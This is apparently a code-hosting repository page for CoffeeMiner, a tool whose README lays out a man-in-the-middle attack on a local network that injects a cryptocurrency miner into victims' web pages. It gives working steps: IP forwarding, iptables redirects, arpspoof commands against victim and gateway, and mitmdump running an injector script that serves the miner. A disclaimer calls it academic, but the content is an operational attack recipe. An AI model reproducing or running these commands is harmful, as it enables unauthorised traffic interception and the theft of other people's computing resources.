You can not select more than 25 topics
Topics must start with a letter or number, can include dashes ('-') and can be up to 35 characters long.
arnaucode
c5c24b6bd2
|
6 years ago | |
|---|---|---|
| miner_script | 6 years ago | |
| LICENSE | 6 years ago | |
| README.md | 6 years ago | |
| httpServer.py | 6 years ago | |
| injector.py | 6 years ago | |
| install.sh | 6 years ago | |
| run.py | 6 years ago | |
| victims.txt | 6 years ago | |
README.md
CoffeeMiner
Collaborative Coffee Mining Pool.
Warning: this project is only with academic purposes.
Concept
- Performs a MITM attack
- Injects a js script in all the HTML pages requested by the victims
- The js script injected contains a cryptocurrency miner
- All the devices victims connected to the Lan network, will be mining for the CoffeeMiner
Use
- install.sh
bash install.sh
- edit victims.txt with one IP per line
- run.py
python run.py ipgateway
Manual use
-
needs to have installed mitmproxy https://mitmproxy.org/
- installation:
sudo apt-get install python3-dev python3-pip libffi-dev libssl-dev pip3 install --user mitmproxy -
needs python 3.*
-
configure IPTABLES
echo 1 > /proc/sys/net/ipv4/ip_forward
iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE
iptables -t nat -A PREROUTING -i eth0 -p tcp --dport 80 -j REDIRECT --to-port 8080
iptables -t nat -A PREROUTING -i eth0 -p tcp --dport 443 -j REDIRECT --to-port 8080
- arpspoof to the victims
arpspoof -i eth0 -t <victim_ip> <gateway_ip>
arpspoof -i eth0 -t <gateway_ip> <victim_ip>
- execute the httpServer.py that will serve the script.js that contains the minner:
python httpServer.py
- execute the mitmproxy with the injector.py script:
#~/.local/bin/mitmdump -s "injector.py http://127.0.0.1:8000/script.js"